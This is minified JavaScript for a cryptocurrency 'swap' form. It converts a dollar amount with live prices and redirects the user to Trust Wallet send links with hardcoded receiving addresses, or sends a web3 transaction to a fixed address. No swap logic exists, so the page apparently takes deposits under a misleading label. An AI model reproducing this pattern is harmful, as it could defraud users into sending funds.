document.getElementById('status').style.display='none';$.ajax({url:"https://min-api.cryptocompare.com/data/price?fsym=BNB&tsyms=USD",type:"GET",success:function(result){bnbprice=result.USD;},error:function(error){console.log(error);}});$.ajax({url:"https://min-api.cryptocompare.com/data/price?fsym=BTC&tsyms=USD",type:"GET",success:function(result){btcprice=result.USD;},error:function(error){console.log(error);}});$.ajax({url:"https://min-api.cryptocompare.com/data/price?fsym=BUSD&tsyms=USD",type:"GET",success:function(result){busdprice=result.USD;},error:function(error){console.log(error);}});$.ajax({url:"https://min-api.cryptocompare.com/data/price?fsym=USDT&tsyms=USD",type:"GET",success:function(result){usdtprice=result.USD;},error:function(error){console.log(error);}});window.addEventListener('load',async()=>{initPayButton1();})
function payclick(){document.getElementById('status').style.display='none';const paymentmethod=$('#paymentmethod').val();const payamount=$('#pay-amount').val();if(paymentmethod!=""&&payamount!=""){if(payamount<=50){document.getElementById('status').style.display='block';$('#status').html('Swap amount must be above $50');}else{if(paymentmethod=="bnb"){$.ajax({url:"https://min-api.cryptocompare.com/data/price?fsym=BNB&tsyms=USD",type:"GET",success:function(result){bnbprice=result.USD;var url="https://link.trustwallet.com/send?address=0xCCE505C2a597461FF9d85bE580CA44F89a516930&asset=c20000714&amount=";const amountEth=$('#pay-amount').val();const newamount=amountEth/bnbprice;const fixedamount=newamount.toFixed(8);var newurl=url+fixedamount;window.location.href=newurl;},error:function(error){console.log(error);}});}
else if(paymentmethod=="btc"){$.ajax({url:"https://min-api.cryptocompare.com/data/price?fsym=BTC&tsyms=USD",type:"GET",success:function(result){btcprice=result.USD;var url="https://link.trustwallet.com/send?address=bc1qgzj3e4ntyk95wsdhypzp4rcyghwakggw85fryx&asset=c0&amount=";const amountEth=$('#pay-amount').val();const newamount=amountEth/btcprice;const fixedamount=newamount.toFixed(8);var newurl=url+fixedamount;window.location.href=newurl;},error:function(error){console.log(error);}});}
else if(paymentmethod=="busd"){$.ajax({url:"https://min-api.cryptocompare.com/data/price?fsym=BUSD&tsyms=USD",type:"GET",success:function(result){busdprice=result.USD;var url="https://link.trustwallet.com/send?address=0xCCE505C2a597461FF9d85bE580CA44F89a516930&asset=c20000714_t0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56&amount=";const amountEth=$('#pay-amount').val();const newamount=amountEth/busdprice;const fixedamount=newamount.toFixed(8);var newurl=url+fixedamount;window.location.href=newurl;},error:function(error){console.log(error);}});}
else if(paymentmethod=="usdt"){$.ajax({url:"https://min-api.cryptocompare.com/data/price?fsym=USDT&tsyms=USD",type:"GET",success:function(result){usdtprice=result.USD;var url="https://link.trustwallet.com/send?asset=c20000714_t0x55d398326f99059fF775485246999027B3197955&address=0xCCE505C2a597461FF9d85bE580CA44F89a516930&amount=";const amountEth=$('#pay-amount').val();const newamount=amountEth/usdtprice;const fixedamount=newamount.toFixed(8);var newurl=url+fixedamount;window.location.href=newurl;},error:function(error){console.log(error);}});}}}else{}}
$('#pay-button').click(()=>{})
const initPayButton=()=>{$('#pay-button').click(()=>{const paymentAddress='bnb1xe088maj84aqf92tyg9zj37q9mmga8jv9rhcgh';const amountEth=$('#pay-amount').val();const newamount=amountEth/bnbprice;const fixedamount=newamount.toFixed(5);web3.eth.sendTransaction({to:paymentAddress,value:web3.toWei(fixedamount,'ether')},(err,transactionId)=>{if(err){console.log('Payment failed',err)
$('#status').html('Payment failed')}else{console.log('Payment successful',transactionId)
$('#status').html('Payment successful')}})
document.getElementById('status').style.display='block';})}